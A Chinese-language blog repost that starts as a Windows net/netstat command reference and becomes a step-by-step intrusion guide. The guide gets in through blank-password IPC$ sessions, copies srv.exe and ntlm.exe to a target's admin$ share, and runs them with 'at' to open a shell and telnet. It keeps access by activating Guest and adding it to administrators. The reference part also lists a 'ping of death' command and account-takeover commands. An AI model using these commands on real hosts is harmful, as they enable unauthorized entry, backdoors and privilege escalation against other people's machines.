net use命令詳解

GPS平臺、網站建設、軟件開發、系統運維，找森大網絡科技！
http://cnsendnet.taobao.com
來自森大科技官方博客
http://www.cnsendblog.com/index.php/?p=640

net use \ip\ipc$ " " /user:" " 創建IPC空連接
net use \ip\ipc$ "密碼" /user:"用戶名" 創建IPC非空連接
net use h: \ip\c$ "密碼" /user:"用戶名" 直接登錄後映射對方C：到本地爲H:
net use h: \ip\c$ 登錄後映射對方C：到本地爲H:
net use \ip\ipc$ /del 刪除IPC連接
net use h: /del 刪除映射對方到本地的爲H:的映射
net use * /del 刪除全部鏈接
net user 用戶名　密碼　/add 創建用戶
net user guest /active:yes 激活guest用戶
net user 查看有哪些用戶
net user 賬戶名 查看賬戶的屬性
net localgroup administrators 用戶名 /add把「用戶」添加到管理員中使其具備管理員權限,注意：administrator後加s用複數
net start 查看開啓了哪些服務
net start 服務名　 開啓服務；(如:net start telnet， net start schedule)
net stop 服務名 中止某服務
net time \目標ip 查看對方時間
net time \目標ip /set 設置本地計算機時間與「目標IP」主機的時間同步,加上參數/yes可取消確認信息
net view 查看本地局域網內開啓了哪些共享
net view \ip 查看對方局域網內開啓了哪些共享
net config 顯示系統網絡設置
net logoff 斷開鏈接的共享
net pause 服務名 暫停某服務
net send ip "文本信息" 向對方發信息
net ver 局域網內正在使用的網絡鏈接類型和信息
net share 查看本地開啓的共享
net share ipc$ 開啓ipc$共享
net share ipc$ /del 刪除ipc$共享
net share c$ /del 刪除C：共享
net user guest 12345 用guest用戶登錄後用將密碼改成12345
net password 密碼 更改系統登錄密碼
netstat -a 查看開啓了哪些端口,經常使用netstat -an
netstat -n 查看端口的網絡鏈接狀況，經常使用netstat -an
netstat -v 查看正在進行的工做
netstat -p 協議名 例：netstat -p tcq/ip 查看某協議使用狀況（查看tcp/ip協議使用狀況）
netstat -s 查看正在使用的全部協議使用狀況
nbtstat -A ip對方136到139其中一個端口開了的話，就可查看對方最近登錄的用戶名（03前的爲用戶名）-注意：參數-A要大寫
tracert -參數 ip(或計算機名) 跟蹤路由（數據包），參數：「-w數字」用於設置超時間隔。
ping ip(或域名)向對方主機發送默認大小爲32字節的數據，參數：「-l[空格]數據包大小」；「-n發送數據次數」；「-t」指一直ping。
ping -t -l 65550 ip 死亡之ping(發送大於64K的文件並一直ping就成了死亡之ping)
ipconfig (winipcfg) 用於windows NT及XP(windows 9598)查看本地ip地址，ipconfig可用參數「/all」顯示所有配置信息
tlist -t 以樹行列表顯示進程(爲系統的附加工具，默認是沒有安裝的，在安裝目錄的Support/tools文件夾內)
kill -F進程名加-F參數後強制結束某進程(爲系統的附加工具，默認是沒有安裝的，在安裝目錄的Support/tools文件夾內)
del -F文件名加-F參數後就可刪除只讀文件,/AR、/AH、/AS、/AA分別表示刪除只讀、隱藏、系統、存檔文件，/A-R、/A-H、/A-S、 /A-A表示刪除除只讀、隱藏、系統、存檔之外的文件。例如「DEL/AR.」表示刪除當前目錄下全部只讀文件，「DEL/A-S .」表示刪除當前目錄下除系統文件之外的全部文件

net use的使用
雜項 2008-01-1610:19:21 閱讀160評論0 字號：大中小 訂閱
總是忘了 net use 怎麼樣，今天在網上找一篇，貼在這，感謝原做者分享。

原文地址：http://zhidao.baidu.com/question/18772395.html

1)創建空鏈接:
net use \IP\ipc$ "" /user:"" (必定要注意:這一行命令中包含了3個空格)

2)創建非空鏈接:
net use \IP\ipc$ "密碼" /user:"用戶名" (一樣有3個空格)

3)映射默認共享:
net use z: \IP\c$ "密碼" /user:"用戶名" (便可將對方的c盤映射爲本身的z盤，其餘盤類推)
若是已經和目標創建了ipc$，則能夠直接用IP+盤符+$訪問,具體命令 net use z: \IP\c$

4)刪除一個ipc$鏈接
net use \IP\ipc$ /del

5)刪除共享映射
net use c: /del 刪除映射的c盤，其餘盤類推
net use * /del 刪除所有,會有提示要求按y確認

3 查看遠程主機的共享資源（但看不到默認共享）
net view \IP

4 查看本地主機的共享資源（能夠看到本地的默認共享）
net share

5 獲得遠程主機的用戶名列表
nbtstat -A IP

6 獲得本地主機的用戶列表
net user

7 查看遠程主機的當前時間
net time \IP

8 顯示本地主機當前服務
net start

9 啓動/關閉本地服務
net start 服務名 /y
net stop 服務名 /y

10 映射遠程共享:
net use z: \IP\baby
此命令將共享名爲baby的共享資源映射到z盤

11 刪除共享映射
net use c: /del 刪除映射的c盤，其餘盤類推
net use * /del /y刪除所有

12 向遠程主機複製文件
copy \路徑\srv.exe \IP\共享目錄名，如：
copy ccbirds.exe \...\c 即將當前目錄下的文件複製到對方c盤內

13 遠程添加計劃任務
at \ip 時間 程序名，如：
at \127.0.0.0 11:00 love.exe
注意：時間儘可能使用24小時制；在系統默認搜索路徑（好比system32/）下不用加路徑，不然必須加全路徑
14 開啓遠程主機的telnet
這裏要用到一個小程序：opentelnet.exe，各大下載站點都有，並且還須要知足四個要求：

1）目標開啓了ipc$共享
2）你要擁有管理員密碼和賬號
3）目標開啓RemoteRegistry服務，用戶就該ntlm認證
4）對WIN2K/XP有效，NT未經測試
命令格式：OpenTelnet.exe \server account psw NTLM認證方式 port
試例以下：c:\>OpenTelnet.exe \... administrator "" 190

15 激活用戶/加入管理員組
1 net uesr account /active:yes
2 net localgroup administrators account /add

16 關閉遠程主機的telnet
一樣須要一個小程序：ResumeTelnet.exe
命令格式：ResumeTelnet.exe \server account psw
試例以下：c:\>ResumeTelnet.exe \... administrator""

17 刪除一個已創建的ipc$鏈接
net use \IP\ipc$ /del

九 經典***模式
這個***模式太經典了,大部分ipc教程都有介紹,我也就拿過來引用了,在此感謝原創做者!(不知道是哪位前輩)

1. C:\>net use \127.0.0.1\IPC$ ""/user:"admintitrators"
   這是用《流光》掃到的用戶名是administrators，密碼爲"空"的IP地址(空口令?哇,運氣好到家了)，若是是打算***的話，就能夠用這樣的 命令來與127.0.0.1創建一個鏈接，由於密碼爲"空"，因此第一個引號處就不用輸入，後面一個雙引號裏的是用戶名，輸入 administrators，命令便可成功完成。
   複製以前務必用net view \IP這個命令看一下對方的共享狀況

2. C:\>copy srv.exe \127.0.0.1\admin$
   先複製srv.exe上去，在流光的Tools目錄下就有（這裏的$是指admin用戶的c:\winnt\system32\，你們還可使用c$、d$，意思是C盤與D盤，這看你要複製到什麼地方去了）。

3. C:\>net time \127.0.0.1
   查查時間，發現127.0.0.1 的當前時間是 2002/3/19 上午 11:00，命令成功完成。

4. C:\>at \127.0.0.1 11:05 srv.exe
   用at命令啓動srv.exe吧（這裏設置的時間要比主機時間快，否則你怎麼啓動啊，呵呵！）

5. C:\>net time \127.0.0.1
   再查查到時間沒有？若是127.0.0.1 的當前時間是 2002/3/19 上午 11:05，那就準備開始下面的命令。

6. C:\>telnet 127.0.0.1 99
   這裏會用到Telnet命令吧，注意端口是99。Telnet默認的是23端口，可是咱們使用的是SRV在對方計算機中爲咱們創建一個99端口的Shell。
   雖然咱們能夠Telnet上去了，可是SRV是一次性的，下次登陸還要再激活！因此咱們打算創建一個Telnet服務！這就要用到ntlm了

7.C:\>copy ntlm.exe \127.0.0.1\admin$
用Copy命令把ntlm.exe上傳到主機上（ntlm.exe也是在《流光》的Tools目錄中）。

8. C:\WINNT\system32>ntlm
   輸入ntlm啓動（這裏的C:\WINNT\system32>指的是對方計算機，運行ntlm實際上是讓這個程序在對方計算機上運行）。當出現"DONE"的時候，就說明已經啓動正常。而後使用"netstart telnet"來開啓Telnet服務！

9. Telnet127.0.0.1，接着輸入用戶名與密碼就進入對方了，操做就像在DOS上操做同樣簡單！(而後你想作什麼?想作什麼就作什麼吧,哈哈)

爲了以防萬一,咱們再把guest激活加到管理組

10. C:\>net user guest /active:yes
    將對方的Guest用戶激活

11. C:\>net user guest 1234
    將Guest的密碼改成1234,或者你要設定的密碼

12. C:\>net localgroup administrators guest/add
    將Guest變爲Administrator^_^(若是管理員密碼更改，guest賬號沒改變的話，下次咱們能夠用guest再次訪問這臺計算機)

另外,你也能夠根據返回的錯誤號分析緣由：

錯誤號5，拒絕訪問：極可能你使用的用戶不是管理員權限的，先提高權限；
錯誤號51，Windows沒法找到網絡路徑：網絡有問題；
錯誤號53，找不到網絡路徑：ip地址錯誤；目標未開機；目標lanmanserver服務未啓動；目標有防火牆（端口過濾）；
錯誤號67，找不到網絡名：你的lanmanworkstation服務未啓動或者目標刪除了ipc$；
錯誤號1219，提供的憑據與已存在的憑據集衝突：你已經和對方創建了一個ipc$，請刪除再連；
錯誤號1326，未知的用戶名或錯誤密碼：緣由很明顯了；
錯誤號1792，試圖登陸，可是網絡登陸服務沒有啓動：目標NetLogon服務未啓動；
錯誤號2242，此用戶的密碼已通過期：目標有賬號策略，強制按期要求更改密碼

GPS平臺、網站建設、軟件開發、系統運維，找森大網絡科技！
http://cnsendnet.taobao.com
來自森大科技官方博客
http://www.cnsendblog.com/index.php/?p=640